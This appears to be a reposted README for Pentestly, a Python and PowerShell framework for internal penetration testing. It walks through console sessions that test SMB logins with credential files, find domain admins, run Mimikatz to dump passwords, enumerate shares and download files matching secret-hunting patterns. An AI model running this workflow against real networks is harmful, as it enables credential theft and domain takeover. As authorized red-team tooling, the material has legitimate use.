Pentestly - Python and Powershell internal Penetration Testing Framework
Blog post: Pentestly Framework: When Pentesting Meets Python and Powershell
Author: @ctfhacker / Cory Duplantis
Demo
Current features
- Import NMAP XML
- Test SMB authentication using:
- individual credentials
- file containing credentials
- null credentials
- NTLM hash
- Test local administrator privileges for successful SMB authentication
- Identify readable SMB shares for valid credentials
- Store Domain/Enterprise Admin account names
- Determine location of running Domain Admin processes
- Determine systems of logged in Domain Admins
- Execute Powershell commands in memory and exfil results
- Execute Mimikatz to gather plaintext password from memory ( Invoke-Mimikatz.ps1 )
- Receive a command shell ( Powercat )
- Receive a meterpreter session ( Invoke-Shellcode.ps1 )
Shoulders of Giants
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
- recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
- wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI
- smbmap.py - Useful utility for enumerating SMB shares
- Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
- powercat.ps1 - Netcat-esque functionality in Powershell
- Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell
- CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly
Install
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestlyUsage
Let's walk through several functions currently implemented.
Change workspace
[pentestly][default] > workspaces list
+------------+
| Workspaces |
+------------+
| default |
+------------+
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select projectLoad from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name Current Value Required Description
-------- ------------- -------- -----------
FILENAME /root/PROJECT/full-all-alive.xml yes Path and filename for nmap XML input
[pentestly][project][nmap_xml] > runTest logins
Use file with creds to test login
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'Gather Domain and Enterprise admins
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2Run mimikatz over IPs with executable rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts
0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
+---------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | | nsportsman | password1! | zojix | | | True | True | login |
+---------------------------------------------------------------------------------------------------------------+Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
+--------------------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix | | | True | True | login |
+--------------------------------------------------------------------------------------------------------------------------+Enumshares
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})Show new shares
[pentestly][default][interesting_files] > show pentestly_shares
+------------------------------------------------------------------------------------------------+
| rowid | host | username | readwrite | readonly | noaccess | module |
+-------------------------------------------------------------------------------------------------+
| 1 | 192.168.224.252 | Administrator | | ADMIN$,C,C$,Users | IPC$ | enumshares |
+-------------------------------------------------------------------------------------------------+Find/Download interesting files
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details) pattern to something a bit more specialized [pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txtContributing
Creating new modules is easy in Pentestly. Begin with the code provided in
skeleton.py : from libs.pentestlymodule import PentestlyModule
class Module(PentestlyModule):
meta = {
'name': 'Your module name goes here',
'author': 'Developer name goes here',
'description': 'Description of the module goes here',
'query': 'SQL QUERY whose result is passed to your module',
'options': (
('Option1', 'Default Value', Required-True/False, 'Description of option'),
),
}
def module_pre(self):
# Optional
# Happens before your module
def module_run(self, data):
# Required
# data is the result from the SQL query set in the options
### Few magic functions
# self.query - Perform an SQL query on the internal database
results = self.query("select * from pentestly_creds")
# self.output - print default information to the user
self.output("Performed an SQL query")
self.output(results)
# self.alert - print successful message to the user
self.success("Yay! We performed successful work")
def module_post(self):
# Optional
# Happens after your module meta dict with the corresponding information as well as the module_run function for module functionality. This script is then placed in the
modules/ folder or in your personal ~/.pentestly/modules folder for portability. Stay tuned for a detailed example script explanation in the coming weeks.
TODO
- Implement
secretsdump.pymodule - Add utility functions for database queries similar to
creds,services - Rework draw_table function to have fixed width columns
- Import credentials from Gladius
- Implement GPP password search and decrypt module
- Look into utilizing Invoke-Shellcode
Changelog
0.1.0 (2016-02-18)
Initial release
Pentestly - Python and Powershell internal Penetration Testing Framework
Reviewed by Zion3R
on
4:30 PM
Rating:
Reviewed by Zion3R
on
4:30 PM
Rating:
